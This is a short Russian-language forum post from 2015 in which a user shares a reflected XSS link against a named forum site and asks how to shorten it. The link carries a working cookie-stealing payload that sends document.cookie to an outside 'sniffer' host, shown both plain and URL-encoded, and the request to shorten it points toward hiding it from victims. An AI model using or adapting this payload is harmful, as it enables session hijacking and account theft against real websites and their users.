PDA

Просмотр полной версии : Случайно нашёл xss или это не баг?


sander
23.08.2015, 10:11
захожу на 8b.kz ввожу xss

.SpoilerTarget" type="button">Spoiler: xss
http://agronews.ru/forums/index.php?ACTION=FORUM_SUBSCRIBE&FID=1414'"()&%img = new Image(); img.src = "http://hacker-lab.com/sniffer/images/sex4iki_1.gif?"+document.cookie;alert(document.cookie)&PAGE_NAME=list&sessid=69fa9ea1c1f8fa858cb91f13ece82f69 (http://agronews.ru/forums/index.php?ACTION=FORUM_SUBSCRIBE&FID=1414%27%22%28%29%26%25%3Cscript%3Eimg%20=%20ne w%20Image%28%29;%20img.src%20=%20%22http://hacker-lab.com/sniffer/images/sex4iki_1.gif?%22+document.cookie;%3C/script%3E%3Cacx%3E%3CScRiPt%20%3Ealert%28document. cookie%29%3C/ScRiPt%3E&PAGE_NAME=list&sessid=69fa9ea1c1f8fa858cb91f13ece82f69)
а дальше окно с символами где кстати засветилась моя винда,её битность,куки .

При чём сама ссылка с xss которую я пытался сократить от другово сайта .

Как сократить xss?